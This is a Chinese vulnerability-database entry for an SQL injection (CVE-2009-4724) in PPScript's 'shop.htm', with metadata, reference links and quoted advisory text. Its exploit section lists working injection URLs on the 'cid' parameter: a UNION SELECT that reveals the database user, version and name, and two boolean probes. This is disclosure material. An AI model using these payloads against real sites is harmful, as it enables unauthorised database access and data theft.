PaymentProcessorScript.net PPScript 'shop.htm'文件 SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118227 漏洞类型 SQL注入
发布时间 2009-08-03 更新时间 2009-08-03
CVE编号 CVE-2009-4724 CNNVD-ID CNNVD-201003-233
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/34493
https://www.securityfocus.com/bid/42539
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201003-233
|漏洞详情
PaymentProcessorScript.netPPScript中的shop.htm存在SQL注入漏洞。远程攻击者可以借助cid参数执行任意的SQL命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/42539/info

PPScript is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 


http://www.example.com/shop.htm?cid=999999999+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())
http://www.example.com/shop.htm?cid=31+and+1=1
http://www.example.com/shop.htm?cid=31+and+1=100
|受影响的产品
PaymentProcessorScript PPScript 0
|参考资料

来源:MILW0RM
名称:9351
链接:http://www.milw0rm.com/exploits/9351
来源:SECUNIA
名称:36100
链接:http://secunia.com/advisories/36100